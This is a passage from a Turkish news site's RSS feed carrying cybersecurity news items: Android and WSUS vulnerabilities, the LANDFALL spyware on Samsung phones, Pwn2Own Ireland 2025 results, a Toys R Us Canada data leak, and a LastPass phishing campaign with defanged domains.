<p data-start="1729" data-end="2021"><strong data-start="1729" data-end="1769">İlgili Diğer Zafiyet: CVE-2025-48581</strong><br data-start="1769" data-end="1772">Google ayrıca Android 16 sürümünde tespit edilen yüksek riskli bir <strong data-start="1839" data-end="1868">ayrıcalık yükseltme (EoP)</strong> zafiyetini <strong data-start="1880" data-end="1912">CVE-2025-48581 (A-428945391)</strong> koduyla duyurdu. Bu zafiyetin RCE açığıyla birlikte zincirleme olarak kullanılabileceği değerlendiriliyor.</p>
<p data-start="2023" data-end="2362"><strong data-start="2023" data-end="2068">Kullanıcılara Uyarı ve Güvenlik Önerileri</strong><br data-start="2068" data-end="2071">Uzmanlar, bu tür “0-click” saldırıların kullanıcıdan herhangi bir etkileşim gerektirmediği için özellikle tehlikeli olduğunu belirtiyor. Google, kullanıcıların <strong data-start="2231" data-end="2291">resmî güvenlik güncellemelerini beklemeden yüklemelerini</strong>, ayrıca <strong data-start="2300" data-end="2352">bilinmeyen kaynaklardan uygulama yüklememelerini</strong> önerdi.</p>
<p><a href="https://beykozunsesi.com.tr/android-0-click-rce-acigi-cve-2025-48593-google-kritik-guvenlik-uyarisi-yayimladi" target="_blank" rel="noopener">Android 0-click RCE açığı CVE-2025-48593: Google kritik güvenlik uyarısı yayımladı</a></p>
<p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Samsung Galaxy Cihazlarını Hedef Alan “LANDFALL” Casus Yazılımı Ortaya Çıkarıldı: Türkiye de Saldırı Kapsamında</title>
<link>https://www.ajansexpres.com.tr/samsung-galaxy-cihazlarini-hedef-alan-landfall-casus-yazilimi-ortaya-cikarildi-turkiye-de-saldiri-kapsaminda</link>
<guid>https://www.ajansexpres.com.tr/samsung-galaxy-cihazlarini-hedef-alan-landfall-casus-yazilimi-ortaya-cikarildi-turkiye-de-saldiri-kapsaminda</guid>
<description><![CDATA[ Palo Alto Networks’ün Unit 42 ekibi, Samsung Galaxy S22, S23, S24 modelleri ile Z Fold4 ve Z Flip4 gibi üst seviye cihazları hedef alan “LANDFALL” adlı ticari düzeyde bir Android casus yazılımını ortaya çıkardı. Yazılım, Samsung’un görüntü işleme kütüphanesindeki sıfır gün (zero-day) açığını kötü amaçlı DNG dosyalarıyla sömürerek cihazlara sızıyor. Türkiye, Irak, İran ve Fas gibi ülkelerdeki kullanıcıların saldırı kapsamında olduğu, altyapının ise Orta Doğu merkezli gelişmiş bir casusluk yapılanmasıyla örtüştüğü bildirildi. Samsung, Nisan 2025’te ana açığı, Eylül 2025’te benzer ikinci açığı kapattı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69110f3b42e8e.webp" length="37514" type="image/jpeg"/>
<pubDate>Mon, 10 Nov 2025 01:01:49 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>samsung galaxy s24 casus yazılımı, landfall android spyware nedir, türkiye hedefli siber saldırı 2025, whatsapp dng güvenlik açığı</media:keywords>
<content:encoded><![CDATA[<p>Palo Alto Networks’ün tehdit araştırma birimi <strong data-start="811" data-end="822">Unit 42</strong>, “<strong data-start="825" data-end="837">LANDFALL</strong>” adını verdikleri yeni bir Android casus yazılım kampanyasını ortaya çıkardı. Saldırının, Samsung’un <strong data-start="939" data-end="963">Galaxy S22, S23, S24</strong> serileriyle birlikte <strong data-start="985" data-end="1007">Z Fold4 ve Z Flip4</strong> gibi üst düzey modelleri hedef aldığı açıklandı. Araştırmacılar, bu cihazların Samsung’a özgü <strong data-start="1102" data-end="1128">libimagecodec.quram.so</strong> adlı görüntü işleme bileşeninde yer alan <strong data-start="1170" data-end="1188">CVE-2025-21042</strong> güvenlik açığı üzerinden istismar edildiğini belirtti.</p>
<p data-start="1247" data-end="1545"><strong data-start="1247" data-end="1288">Hedef Ülkeler Arasında Türkiye de Var</strong><br data-start="1288" data-end="1291">Unit 42’nin raporuna göre LANDFALL saldırıları Türkiye, Irak, İran ve Fas başta olmak üzere bölgesel olarak kümelenmiş durumda. Araştırmacılar, bu nedenle LANDFALL’ın genel bir zararlı yazılım değil, <strong data-start="1491" data-end="1523">bölgesel casusluk operasyonu</strong> olduğunu vurguladı.</p>
<p data-start="1547" data-end="1957"><strong data-start="1547" data-end="1589">Görsel Dosya Görünümlü Bulaşma Yöntemi</strong><br data-start="1589" data-end="1592">Casus yazılım, WhatsApp üzerinden gönderilen kötü amaçlı <strong data-start="1649" data-end="1679">DNG formatındaki görseller</strong> aracılığıyla cihazlara sızıyor. Bozuk (malformed) dosya, görüntü işleme kütüphanesindeki açığı tetikleyerek casus modülleri cihazın sistem dizinlerine bırakıyor. Unit 42, bu istismarın kullanıcı etkileşimi gerektirmeden “<strong data-start="1901" data-end="1915">zero-click</strong>” şeklinde gerçekleşebileceğini aktardı.</p>
<p data-start="1959" data-end="2285"><strong data-start="1959" data-end="1989">Casusluk Yetenekleri Geniş</strong><br data-start="1989" data-end="1992">LANDFALL; cihaz kimlik bilgileri, çağrı kayıtları, mikrofon sesleri, mesaj içerikleri, konum verileri, rehber ve kamera erişimleri gibi birçok veriyi toplama kapasitesine sahip. Bu yönüyle yazılım, siber gözetim ve saha takibi için profesyonel düzeyde tasarlanmış bir araç olarak tanımlandı.</p>
<p data-start="2287" data-end="2596"><strong data-start="2287" data-end="2338">Samsung Açıkları Nisan ve Eylül 2025’te Kapattı</strong><br data-start="2338" data-end="2341">Samsung, Nisan 2025’te LANDFALL tarafından sömürülen açığı giderdi, Eylül 2025’te ise aynı kütüphanedeki benzer bir zafiyeti (CVE-2025-21043) kapattı. Güvenlik yamalarının özellikle Galaxy S serisi ve katlanabilir modeller için kritik olduğu bildirildi.</p>
<p data-start="2598" data-end="2886"><strong data-start="2598" data-end="2627">Türkiye USOM Erken Uyardı</strong><br data-start="2627" data-end="2630">Türkiye Ulusal Siber Olaylara Müdahale Merkezi (<strong data-start="2678" data-end="2686">USOM</strong>), 2025 yazında LANDFALL saldırısında kullanılan komuta kontrol (C2) alan adlarını “zararlı bağlantılar” listesine dahil etti. Bu durum, Türkiye’nin kampanyayı erken evrede tespit ettiğini gösterdi.</p>
<p data-start="2888" data-end="3251"><strong data-start="2888" data-end="2934">Orta Doğu Merkezli Casusluk Yapısı Şüphesi</strong><br data-start="2934" data-end="2937">Unit 42, LANDFALL’ın kullandığı altyapıların, daha önce <strong data-start="2993" data-end="3027">Stealth Falcon / Project Raven</strong> gibi <strong data-start="3033" data-end="3079">BAE merkezli ticari casusluk operasyonları</strong>yla benzerlik taşıdığını açıkladı. Araştırmacılar, yazılımın devlet kurumlarına hizmet veren özel sektör menşeli saldırı operatörlerince geliştirildiğini değerlendiriyor.</p>
<p><a href="https://beykozunsesi.com.tr/samsung-galaxy-cihazlarini-hedef-alan-landfall-casus-yazilimi-ortaya-cikarildi-turkiye-de-saldiri-kapsaminda" target="_blank" rel="noopener">Samsung Galaxy Cihazlarını Hedef Alan “LANDFALL” Casus Yazılımı Ortaya Çıkarıldı: Türkiye de Saldırı Kapsamında</a></p>
<p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Toys “R” Us Canada Müşteri Verilerinin Sızdırıldığını Doğruladı: Kişisel Bilgiler Dark Web’de Ortaya Çıktı</title>
<link>https://www.ajansexpres.com.tr/toys-r-us-canada-musteri-verilerinin-sizdirildigini-dogruladi-kisisel-bilgiler-dark-webde-ortaya-cikti</link>
<guid>https://www.ajansexpres.com.tr/toys-r-us-canada-musteri-verilerinin-sizdirildigini-dogruladi-kisisel-bilgiler-dark-webde-ortaya-cikti</guid>
<description><![CDATA[ Kanada merkezli Toys “R” Us, müşterilerine gönderdiği bilgilendirme mektubunda şirket sistemlerinden çalınan müşteri verilerinin siber saldırganlar tarafından karanlık ağda (dark web) yayımlandığını açıkladı. 30 Temmuz 2025’te fark edilen veri sızıntısının ardından başlatılan soruşturmada, sızdırılan bilgilerin gerçek olduğu doğrulandı. Şirket, parola ve kredi kartı bilgilerinin etkilenmediğini bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68fbeacdb0561.webp" length="37710" type="image/jpeg"/>
<pubDate>Sat, 25 Oct 2025 00:08:40 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>toys r us canada veri ihlali, müşteri bilgileri dark web sızıntısı, kişisel veriler nasıl korulur, toys r us kimlik avı uyarısı, kanada gizlilik otoritesi bildirimi</media:keywords>
<content:encoded><![CDATA[<p><strong data-start="561" data-end="614">Veri Sızıntısı Dark Web Paylaşımıyla Ortaya Çıktı</strong><br data-start="614" data-end="617">Toys “R” Us Canada, 30 Temmuz 2025 tarihinde internetteki indekslenmemiş alanlarda müşteri verilerinin satışa çıkarıldığına dair paylaşımlar fark etti. Şirket, olayı doğrulamak ve etkilerini sınırlamak amacıyla bağımsız siber güvenlik uzmanlarından destek aldı. Yapılan incelemede, saldırganların müşteri veritabanındaki bazı kayıtları kopyaladığı tespit edildi.</p>
<p></p>
<p data-start="983" data-end="1365"><strong data-start="983" data-end="1032">Sızdırılan Bilgiler Kişisel Verileri İçeriyor</strong><br data-start="1032" data-end="1035">Şirketin müşterilere gönderdiği bildirim mektubuna göre, sızdırılan bilgiler kişiden kişiye değişmekle birlikte <strong data-start="1147" data-end="1211">ad-soyad, fiziksel adres, e-posta adresi ve telefon numarası</strong> gibi kişisel verileri kapsıyor. Toys “R” Us, hesap parolaları, kredi kartı bilgileri veya benzeri gizli verilerin bu olaydan etkilenmediğini vurguladı.</p>
<p data-start="1367" data-end="1685"><strong data-start="1367" data-end="1401">Güvenlik Önlemleri Güncellendi</strong><br data-start="1401" data-end="1404">Olayın ardından Toys “R” Us Canada, BT altyapısında güvenlik önlemlerini güçlendirdiğini ve süreci siber güvenlik uzmanlarının rehberliğinde yürüttüğünü açıkladı. Şirket, aynı zamanda Kanada’daki ilgili gizlilik denetim kurumlarını da resmi olarak bilgilendirme sürecine başladı.</p>
<p data-start="1687" data-end="2054"><strong data-start="1687" data-end="1734">Müşterilere Uyarı: Kimlik Avına Dikkat Edin</strong><br data-start="1734" data-end="1737">Toys “R” Us Canada, olaydan etkilenen müşterilere gönderdiği uyarıda, şirket adını kullanan sahte e-postalar veya mesajlar aracılığıyla bilgi talep eden kimlik avı girişimlerine karşı dikkatli olunmasını istedi. Müşterilerden, şüpheli iletişimleri yanıtsız bırakmaları ve kişisel bilgilerini paylaşmamaları istendi.</p>
<p data-start="2056" data-end="2303"><strong data-start="2056" data-end="2087">Toys “R” Us Canada Hakkında</strong><br data-start="2087" data-end="2090">Toys “R” Us Canada, uluslararası oyuncak zinciri Toys “R” Us’un Kanada’daki iştiraki olarak ülke genelinde 40 mağazada faaliyet gösteriyor. Şirket, oyuncak, video oyunları ve çocuk giyim ürünleri satışı yapıyor.</p>
<p data-start="2305" data-end="2484"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Pwn2Own Ireland 2025’te 73 Sıfır Gün Açığı Ortaya Çıktı: Hacker’lara 1 Milyon Doların Üzerinde Ödül</title>
<link>https://www.ajansexpres.com.tr/pwn2own-ireland-2025te-73-sifir-gun-acigi-ortaya-cikti-hackerlara-1-milyon-dolarin-uzerinde-odul</link>
<guid>https://www.ajansexpres.com.tr/pwn2own-ireland-2025te-73-sifir-gun-acigi-ortaya-cikti-hackerlara-1-milyon-dolarin-uzerinde-odul</guid>
<description><![CDATA[ Bu yılki Pwn2Own Ireland etkinliği, yazıcılar, ağ depolama sistemleri, mesajlaşma uygulamaları, akıllı ev cihazları, gözetim ekipmanları, ev ağ donanımları, akıllı telefonlar (Apple iPhone 16, Samsung Galaxy S25, Google Pixel 9) ve giyilebilir teknolojiler (Meta Ray-Ban Smart Glasses, Quest 3/3S) olmak üzere geniş bir hedef yelpazesine sahipti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68fbe9da5e742.webp" length="27664" type="image/jpeg"/>
<pubDate>Sat, 25 Oct 2025 00:04:37 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>pwn2own ireland 2025 kazananlar, sıfır gün güvenlik açığı, summoning team samsung galaxy s25 hack, zero day initiative nedir, zdi ödül sistemi</media:keywords>
<content:encoded><![CDATA[<p><br data-start="629" data-end="632"><strong data-start="632" data-end="684">Sekiz Kategoride Rekor Sayıda Açık Tespit Edildi</strong><br data-start="684" data-end="687">Bu yılki Pwn2Own Ireland etkinliği, yazıcılar, ağ depolama sistemleri, mesajlaşma uygulamaları, akıllı ev cihazları, gözetim ekipmanları, ev ağ donanımları, akıllı telefonlar (Apple iPhone 16, Samsung Galaxy S25, Google Pixel 9) ve giyilebilir teknolojiler (Meta Ray-Ban Smart Glasses, Quest 3/3S) olmak üzere geniş bir hedef yelpazesine sahipti.</p>
<p></p>
<p data-start="1037" data-end="1388"><strong data-start="1037" data-end="1089">Yeni Kategori: USB Üzerinden Telefon Saldırıları</strong><br data-start="1089" data-end="1092">Bu yıl yarışmaya eklenen yeni kategoriyle, araştırmacılara <strong data-start="1151" data-end="1250">USB bağlantısı üzerinden kilitli mobil cihazlara fiziksel erişim yoluyla saldırı gerçekleştirme</strong> görevi verildi. Bunun yanında klasik kablosuz protokoller olan <strong data-start="1314" data-end="1341">Bluetooth, Wi-Fi ve NFC</strong> de geçerli saldırı yüzeyleri arasında kaldı.</p>
<p data-start="1390" data-end="1777"><strong data-start="1390" data-end="1416">Summoning Team Zirvede</strong><br data-start="1416" data-end="1419">Etkinliğin kazananı, 22 “Master of Pwn” puanı ve <strong data-start="1468" data-end="1485">187.500 dolar</strong> ödül kazanan <strong data-start="1499" data-end="1517">Summoning Team</strong> oldu. Ekip, <strong data-start="1530" data-end="1552">Samsung Galaxy S25</strong>, <strong data-start="1554" data-end="1589">Synology DiskStation DS925+ NAS</strong>, <strong data-start="1591" data-end="1615">Home Assistant Green</strong>, <strong data-start="1617" data-end="1659">Synology ActiveProtect Appliance DP320</strong>, <strong data-start="1661" data-end="1687">Synology CC400W kamera</strong> ve <strong data-start="1691" data-end="1711">QNAP TS-453E NAS</strong> cihazlarını başarılı şekilde hackleyerek birinciliği elde etti.</p>
<p data-start="1779" data-end="1961"><strong data-start="1779" data-end="1807">İkinci ve Üçüncü Sıralar</strong><br data-start="1807" data-end="1810">İkinci sırada 11,5 puan ve <strong data-start="1837" data-end="1853">76.750 dolar</strong> kazanan <strong data-start="1862" data-end="1877">Team ANHTUD</strong>, üçüncü sırada ise 11 puan ve <strong data-start="1908" data-end="1924">90.000 dolar</strong> ödülle <strong data-start="1932" data-end="1949">Team Synactiv</strong> yer aldı.</p>
<p data-start="1963" data-end="2255"><strong data-start="1963" data-end="2016">Samsung Galaxy S25 Üzerinde Dikkat Çeken İstismar</strong><br data-start="2016" data-end="2019">Yarışmanın son gününde, <strong data-start="2043" data-end="2061">Interrupt Labs</strong> ekibi, <strong data-start="2069" data-end="2091">Samsung Galaxy S25</strong> üzerinde girdi doğrulama hatasından yararlanarak cihazın <strong data-start="2149" data-end="2188">kamera ve konum servislerine erişim</strong> sağladı. Bu başarı, ekibe 5 puan ve <strong data-start="2225" data-end="2241">50.000 dolar</strong> kazandırdı.</p>
<p data-start="2257" data-end="2667"><strong data-start="2257" data-end="2311">ZDI: Sıfır Günleri Güvenli Şekilde Ortaya Çıkarmak</strong><br data-start="2311" data-end="2314">Yarışmayı düzenleyen <strong data-start="2335" data-end="2364">Zero Day Initiative (ZDI)</strong>, etkinliğin amacının güvenlik açıklarını kötü niyetli kişiler kullanmadan önce tespit etmek ve üreticilerle koordineli şekilde kapatılmasını sağlamak olduğunu vurguladı. Açıkların duyurulmasından sonra firmalara <strong data-start="2577" data-end="2587">90 gün</strong> süre tanınıyor; bu sürenin sonunda Trend Micro tarafından kamuya açıklanıyor.</p>
<p data-start="2669" data-end="2939"><strong data-start="2669" data-end="2706">Bir Sonraki Durağı Japonya Olacak</strong><br data-start="2706" data-end="2709">ZDI, bir sonraki <strong data-start="2726" data-end="2753">Pwn2Own Automotive 2026</strong> etkinliğinin Ocak ayında Japonya’nın Tokyo kentinde, <strong data-start="2807" data-end="2827">Automotive World</strong> teknoloji fuarı kapsamında düzenleneceğini duyurdu. Yarışma yine <strong data-start="2893" data-end="2902">Tesla</strong> sponsorluğunda gerçekleştirilecek.</p>
<p data-start="2941" data-end="3098"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft, WSUS Güvenlik Açığına Karşı Acil Güncelleme Yayımladı: PoC İstismarı Yayında</title>
<link>https://www.ajansexpres.com.tr/microsoft-wsus-guvenlik-acigina-karsi-acil-guncelleme-yayimladi-poc-istismari-yayinda</link>
<guid>https://www.ajansexpres.com.tr/microsoft-wsus-guvenlik-acigina-karsi-acil-guncelleme-yayimladi-poc-istismari-yayinda</guid>
<description><![CDATA[ Microsoft’un açıklamasına göre CVE-2025-59287, yalnızca WSUS Server rolü etkinleştirilmiş Windows sunucularında ortaya çıkıyor. Açık, saldırganların kullanıcı etkileşimi olmadan kötü amaçlı olaylar tetikleyerek nesne serileştirme hatası üzerinden uzaktan kod çalıştırmasına izin veriyor. Yetkisiz bir saldırgan, bu zafiyeti kullanarak SYSTEM haklarına sahip olabiliyor ve saldırının diğer WSUS sunucularına yayılma potansiyeli bulunuyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68fbe8d8668ce.webp" length="29488" type="image/jpeg"/>
<pubDate>Sat, 25 Oct 2025 00:00:19 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>windows server wsus güvenlik açığı, cve-2025-59287 nedir, microsoft acil güncelleme, wsus proof-of-concept kodu, windows sunucu yama listesi</media:keywords>
<content:encoded><![CDATA[<p><br data-start="609" data-end="612"><strong data-start="612" data-end="664">Kritik RCE Açığı Tüm WSUS Sunucularını Etkiliyor</strong><br data-start="664" data-end="667">Microsoft’un açıklamasına göre <strong data-start="698" data-end="716">CVE-2025-59287</strong>, yalnızca WSUS Server rolü etkinleştirilmiş Windows sunucularında ortaya çıkıyor. Açık, saldırganların kullanıcı etkileşimi olmadan kötü amaçlı olaylar tetikleyerek <strong data-start="882" data-end="911">nesne serileştirme hatası</strong> üzerinden uzaktan kod çalıştırmasına izin veriyor. Yetkisiz bir saldırgan, bu zafiyeti kullanarak SYSTEM haklarına sahip olabiliyor ve saldırının diğer WSUS sunucularına yayılma potansiyeli bulunuyor.</p>
<p></p>
<p data-start="1116" data-end="1274"><strong data-start="1116" data-end="1178">Tüm Windows Server Sürümleri İçin Güncellemeler Yayınlandı</strong><br data-start="1178" data-end="1181">Microsoft, Perşembe günü tüm etkilenen sürümler için acil yamalar yayımladı. Güncellemeler;</p>
<ul data-start="1275" data-end="1577">
<li data-start="1275" data-end="1310">
<p data-start="1277" data-end="1310">Windows Server 2025 (KB5070881)</p>
</li>
<li data-start="1311" data-end="1339">
<p data-start="1313" data-end="1339">Version 23H2 (KB5070879)</p>
</li>
<li data-start="1340" data-end="1360">
<p data-start="1342" data-end="1360">2022 (KB5070884)</p>
</li>
<li data-start="1361" data-end="1381">
<p data-start="1363" data-end="1381">2019 (KB5070883)</p>
</li>
<li data-start="1382" data-end="1402">
<p data-start="1384" data-end="1402">2016 (KB5070882)</p>
</li>
<li data-start="1403" data-end="1426">
<p data-start="1405" data-end="1426">2012 R2 (KB5070886)</p>
</li>
<li data-start="1427" data-end="1577">
<p data-start="1429" data-end="1577">2012 (KB5070887)<br data-start="1445" data-end="1448">sürümlerini kapsıyor. Şirket, bu yamaların kümülatif olduğunu ve önceki tüm güvenlik güncellemelerinin yerini aldığını duyurdu.</p>
</li>
</ul>
<p data-start="1579" data-end="1967"><strong data-start="1579" data-end="1625">PoC Kodu Yayınlandı, Tehdit Seviyesi Arttı</strong><br data-start="1625" data-end="1628">Microsoft, güvenlik danışmanlığında yaptığı güncellemeyle zafiyete ait <strong data-start="1699" data-end="1725">proof-of-concept (PoC)</strong> kodunun internette yayımlandığını doğruladı. Bu gelişme, saldırı riskini önemli ölçüde artırdı. Şirket, yamaların derhal uygulanması gerektiğini vurguladı ve güncelleme sonrası sistemlerin yeniden başlatılmasının zorunlu olduğunu belirtti.</p>
<p data-start="1969" data-end="2420"><strong data-start="1969" data-end="2044">Geçici Çözümler: WSUS Rolünü Devre Dışı Bırakın veya Trafiği Engelleyin</strong><br data-start="2044" data-end="2047">Yamaları hemen yükleyemeyen sistem yöneticileri için Microsoft, geçici önlemler paylaştı. Buna göre, WSUS Server rolünün devre dışı bırakılması veya <strong data-start="2196" data-end="2208">8530/TCP</strong> ve <strong data-start="2212" data-end="2224">8531/TCP</strong> portlarındaki gelen trafiğin güvenlik duvarında engellenmesi öneriliyor. Ancak bu önlemler sonrasında Windows istemcilerinin yerel WSUS sunucusundan güncelleme alamayacağı uyarısında bulunuldu.</p>
<p data-start="2422" data-end="2688"><strong data-start="2422" data-end="2474">Senkronizasyon Hataları Geçici Olarak Kaldırıldı</strong><br data-start="2474" data-end="2477">Microsoft, yeni yamalarla birlikte WSUS senkronizasyon hata detaylarının geçici olarak devre dışı bırakıldığını bildirdi. Bu değişiklik, CVE-2025-59287 zafiyetinin etkilerini tamamen gidermek amacıyla yapıldı.</p>
<p data-start="2690" data-end="2972"><strong data-start="2690" data-end="2721">Sistem Yöneticilerine Uyarı</strong><br data-start="2721" data-end="2724">Microsoft, Ekim 2025 güvenlik güncellemesini henüz yüklememiş kullanıcıların doğrudan bu olağan dışı yamayı kurmasını öneriyor. Şirket, güncelleme yapılmadığı takdirde WSUS’un etkinleştirilmesinin sistemleri savunmasız hale getireceğini belirtti.</p>
<p data-start="2974" data-end="3129"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Sahte “Ölüm Bildirimi” E&#45;postalarıyla LastPass Hesapları Hedef Alındı: Yeni Kimlik Avı Kampanyası Uyarısı</title>
<link>https://www.ajansexpres.com.tr/sahte-olum-bildirimi-e-postalariyla-lastpass-hesaplari-hedef-alindi-yeni-kimlik-avi-kampanyasi-uyarisi</link>
<guid>https://www.ajansexpres.com.tr/sahte-olum-bildirimi-e-postalariyla-lastpass-hesaplari-hedef-alindi-yeni-kimlik-avi-kampanyasi-uyarisi</guid>
<description><![CDATA[ LastPass tarafından yapılan açıklamaya göre saldırılar, Ekim ortasında başlayan geniş çaplı bir kimlik avı operasyonunun parçası. Kullanıcılara, bir aile üyesinin ölüm belgesi yükleyerek hesaplarına erişim talebinde bulunduğunu iddia eden e-postalar gönderiliyor. Mesajlarda sahte bir “ajan kimlik numarası” da yer alarak inandırıcılık artırılıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68fbe7bb90af0.webp" length="149736" type="image/jpeg"/>
<pubDate>Fri, 24 Oct 2025 23:55:41 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>lastpass kimlik avı saldırısı, cryptochameleon unc5356 grubu, sahte miras erişim e-postası, passkey hırsızlığı, parola kasası güvenliği</media:keywords>
<content:encoded><![CDATA[<p><strong data-start="583" data-end="638">Sahte E-postalarla Miras Erişim Talebi Gönderiliyor</strong><br data-start="638" data-end="641">LastPass tarafından yapılan açıklamaya göre saldırılar, Ekim ortasında başlayan geniş çaplı bir kimlik avı operasyonunun parçası. Kullanıcılara, bir aile üyesinin ölüm belgesi yükleyerek hesaplarına erişim talebinde bulunduğunu iddia eden e-postalar gönderiliyor. Mesajlarda sahte bir “ajan kimlik numarası” da yer alarak inandırıcılık artırılıyor.</p>
<p></p>
<p data-start="993" data-end="1384"><strong data-start="993" data-end="1035">Kurbanlar Sahte Siteye Yönlendiriliyor</strong><br data-start="1035" data-end="1038">E-postadaki bağlantıya tıklayan kullanıcılar, <strong data-start="1084" data-end="1110">lastpassrecovery[.]com</strong> adresindeki sahte giriş sayfasına yönlendiriliyor. Bu sayfada kullanıcıdan ana parolasını girmesi isteniyor. LastPass, bazı vakalarda saldırganların telefonla arayarak kendilerini şirket çalışanı gibi tanıttığını ve kullanıcıları bu sahte siteye yönlendirdiğini belirtti.</p>
<p data-start="1386" data-end="1847"><strong data-start="1386" data-end="1426">CryptoChameleon Grubu Yeniden Sahada</strong><br data-start="1426" data-end="1429">Aynı tehdit aktörü <strong data-start="1448" data-end="1467">CryptoChameleon</strong>, daha önce Nisan 2024’te de LastPass kullanıcılarını hedef almıştı. Grup, kripto para cüzdanlarını hedefleyen kimlik avı kitleriyle biliniyor ve <strong data-start="1613" data-end="1624">Binance</strong>, <strong data-start="1626" data-end="1638">Coinbase</strong>, <strong data-start="1640" data-end="1650">Kraken</strong> ve <strong data-start="1654" data-end="1664">Gemini</strong> gibi platformları taklit eden sahte oturum açma sayfaları kullanıyor. Yeni kampanyada ise parola kasalarına ek olarak <strong data-start="1783" data-end="1828">FIDO2 / WebAuthn tabanlı passkey verileri</strong> de hedefleniyor.</p>
<p data-start="1849" data-end="2183"><strong data-start="1849" data-end="1888">Yeni Nesil Hedef: Passkey Bilgileri</strong><br data-start="1888" data-end="1891">Saldırganlar, <strong data-start="1905" data-end="1925">mypasskey[.]info</strong> ve <strong data-start="1929" data-end="1951">passkeysetup[.]com</strong> gibi alan adlarını kullanarak passkey odaklı sahte siteler oluşturdu. Uzmanlara göre bu, parola yerine biyometrik veya cihaz tabanlı kimlik doğrulama kullanan sistemlerin artık doğrudan saldırı hedefi haline geldiğini gösteriyor.</p>
<p data-start="2185" data-end="2531"><strong data-start="2185" data-end="2219">Kullanıcılara Güvenlik Uyarısı</strong><br data-start="2219" data-end="2222">LastPass, e-posta veya telefon üzerinden gelen beklenmedik erişim taleplerine yanıt verilmemesi gerektiğini vurguladı. Şirket, kullanıcıların hesap aktivitelerini kontrol etmelerini, yalnızca resmi LastPass alan adlarından giriş yapmalarını ve iki faktörlü kimlik doğrulamayı (2FA) etkin tutmalarını önerdi.</p>
<p data-start="2533" data-end="2935"><strong data-start="2533" data-end="2577">Geçmiş Veri İhlaliyle İlişkilendiriliyor</strong><br data-start="2577" data-end="2580">LastPass 2022 yılında yaşadığı büyük veri ihlalinde şifrelenmiş kasa yedeklerinin sızdırıldığını doğrulamıştı. O olay sonrası gerçekleşen hedefli saldırılarda yaklaşık <strong data-start="2748" data-end="2768">4,4 milyon dolar</strong> değerinde kripto varlık kaybı yaşanmıştı. Yeni kampanyanın, aynı kullanıcı grubuna yönelik uzun vadeli bir takip stratejisinin devamı olabileceği değerlendiriliyor.</p>
<p data-start="2937" data-end="3087"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Windows Server’daki Kritik WSUS Güvenlik Açığı Aktif Olarak İstismar Ediliyor</title>
<link>https://www.ajansexpres.com.tr/windows-serverdaki-kritik-wsus-guvenlik-acigi-aktif-olarak-istismar-ediliyor</link>
<guid>https://www.ajansexpres.com.tr/windows-serverdaki-kritik-wsus-guvenlik-acigi-aktif-olarak-istismar-ediliyor</guid>
<description><![CDATA[  ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68fbe61c70d65.webp" length="37634" type="image/jpeg"/>
<pubDate>Fri, 24 Oct 2025 23:48:38 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>windows server wsus açığı, cve-2025-59287 nedir, microsoft wsus güvenlik güncellemesi, huntress labs saldırı raporu, nscc-nl wsus uyarısı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="629" data-end="632"><strong data-start="632" data-end="686">Uzaktan Kod Çalıştırmaya İzin Veren Kritik Zafiyet</strong><br data-start="686" data-end="689">CVE-2025-59287 kodlu açık, yalnızca <strong data-start="725" data-end="762">WSUS Server rolü etkinleştirilmiş</strong> Windows sunucularını etkiliyor. Saldırganlar, kullanıcı etkileşimi veya yetkilendirme gerektirmeden düşük karmaşıklıkta saldırılarla uzaktan kötü amaçlı kod çalıştırabiliyor. Bu durum, saldırının zincirleme şekilde diğer WSUS sunucularına da yayılabilme riskini beraberinde getiriyor.</p>
<p></p>
<p data-start="1051" data-end="1462"><strong data-start="1051" data-end="1102">Microsoft’tan Olağan Dışı Güvenlik Güncellemesi</strong><br data-start="1102" data-end="1105">Microsoft, Perşembe günü tüm etkilenen sürümler için <strong data-start="1158" data-end="1185">acil düzeltme paketleri</strong> yayımladı. Güncellemeler; Windows Server 2025, 23H2, 2022, 2019, 2016, 2012 R2 ve 2012 sürümleri için KB5070881’den KB5070887’ye kadar uzanan yamalarla sunuldu. Şirket ayrıca, yama uygulaması gecikecek sistem yöneticilerine WSUS rolünü devre dışı bırakma önerisinde bulundu.</p>
<p data-start="1464" data-end="1878"><strong data-start="1464" data-end="1496">Saldırılar Avrupa’da Başladı</strong><br data-start="1496" data-end="1499">Hollanda merkezli <strong data-start="1517" data-end="1533">Eye Security</strong> firması, 24 Ekim sabahı itibarıyla zafiyetin aktif olarak tarandığını ve en az bir müşterisinin sisteminin farklı bir istismar yöntemiyle ele geçirildiğini duyurdu. Aynı zamanda <strong data-start="1712" data-end="1729">Huntress Labs</strong>, saldırganların WSUS’un varsayılan 8530 ve 8531 numaralı TCP portlarını hedef alarak keşif amaçlı PowerShell komutları çalıştırdığını tespit etti.</p>
